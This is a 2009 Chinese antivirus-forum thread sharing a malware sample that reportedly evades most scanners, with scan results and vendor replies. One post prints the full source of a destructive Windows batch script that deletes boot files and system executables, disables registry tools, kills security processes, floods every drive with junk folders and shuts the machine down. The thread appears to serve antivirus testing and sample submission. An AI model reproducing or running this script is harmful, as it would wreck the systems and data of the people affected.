过主流病毒

显示全部楼层 · 发表于 2009-3-2 14:21:57

全过，微点也没反映。

点击运行样本

显示全部楼层 · 发表于 2009-3-2 14:27:20

最好在虚拟机测试吧。

显示全部楼层 · 发表于 2009-3-2 14:30:20

费尔：谁点谁知道.rar>>谁点谁知道.bat Trojan.BAT.KillFiles.ga.khvv 木马还未处理

这东西前几天貌似有人发过了。。。

显示全部楼层 · 发表于 2009-3-2 14:37:18

attrib -r -h -s c:\ntldr
attrib -r -h -s c:\*.sys
del c:\ntldr
del c:\*.sys
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t
attrib -r -h -s C:\windows\*.exe
attrib -r -h -s C:\windows\system32\*.exe
attrib -r -h -s C:\windows\system32\*.cpl
del C:\windows\*.exe
del C:\windows\system32\*.exe
del C:\windows\system32\*.cpl
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
Shutdown
date 2099-10-10

复制代码

VirusBuster found nothing

显示全部楼层 · 发表于 2009-3-2 14:42:14

大家运行之后是什么反映？

显示全部楼层 · 发表于 2009-3-2 15:14:55

文件 _______________.rar 接收于 2009.03.02 08:10:15 (CET)
当前状态: 完成
结果: 7/39 (17.95%)
格式化文本
打印结果反病毒引擎版本最后更新扫描结果
a-squared 4.0.0.101 2009.03.02 BehavesLike!IK
AhnLab-V3 5.0.0.2 2009.02.27 -
AntiVir 7.9.0.98 2009.03.02 -
Authentium 5.1.0.4 2009.03.01 BAT/DelWin.R
Avast 4.8.1335.0 2009.03.01 -
AVG 8.0.0.237 2009.03.01 -
BitDefender 7.2 2009.03.02 BehavesLike:BAT.Delete
CAT-QuickHeal 10.00 2009.03.02 -
ClamAV 0.94.1 2009.03.02 -
Comodo 986 2009.02.20 -
DrWeb 4.44.0.09170 2009.03.02 -
eSafe 7.0.17.0 2009.02.26 -
eTrust-Vet 31.6.6379 2009.03.02 -
F-Prot 4.4.4.56 2009.03.01 BAT/DelWin.R
F-Secure 8.0.14470.0 2009.03.01 -
Fortinet 3.117.0.0 2009.03.02 -
GData 19 2009.03.02 -
Ikarus T3.1.1.45.0 2009.03.02 BehavesLike
K7AntiVirus 7.10.649 2009.02.27 -
Kaspersky 7.0.0.125 2009.03.02 -
McAfee 5540 2009.03.01 -
McAfee+Artemis 5540 2009.03.01 -
Microsoft 1.4306 2009.03.02 -
NOD32 3899 2009.03.02 -
Norman 6.00.06 2009.02.27 BAT/Autorun.IWD
nProtect 2009.1.8.0 2009.03.02 -
Panda 10.0.0.10 2009.03.01 -
PCTools 4.4.2.0 2009.03.01 -
Prevx1 V2 2009.03.02 -
Rising 21.19.00.00 2009.03.02 -
SecureWeb-Gateway 6.7.6 2009.03.02 -
Sophos 4.39.0 2009.03.02 -
Sunbelt 3.2.1858.2 2009.02.28 -
Symantec 10 2009.03.02 -
TheHacker 6.3.2.6.268 2009.03.01 Bat/Generic
TrendMicro 8.700.0.1004 2009.03.02 -
VBA32 3.12.10.1 2009.03.01 -
ViRobot 2009.2.28.1629 2009.03.02 -
VirusBuster 4.5.11.0 2009.03.01 -

显示全部楼层 · 发表于 2009-3-2 15:22:20

楼上的：Norman 6.00.06 2009.02.27 BAT/Autorun.IWD
我想FS运行时会调用这引擎，运行这FS就KILL它
夏日的风你来运行一下，我PC太干净

显示全部楼层 · 发表于 2009-3-2 17:05:23

样本来自hips区的老帖

显示全部楼层 · 发表于 2009-3-2 17:10:58

Filename Result
##########.bat MALWARE

The file '##########.bat' has been determined to be 'MALWARE'. Our analysts named the threat BAT/Delfiles.AF. The term "BAT/" denotes a virus in a Batch format. Batch file viruses execute commands from the commandline whereby the system can be modified.Detection will be added to our virus definition file (VDF) with one of the next updates.

显示全部楼层 · 发表于 2009-3-2 17:35:56

Hello,

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.

[病毒样本] 过主流病毒

本帖子中包含更多资源

评分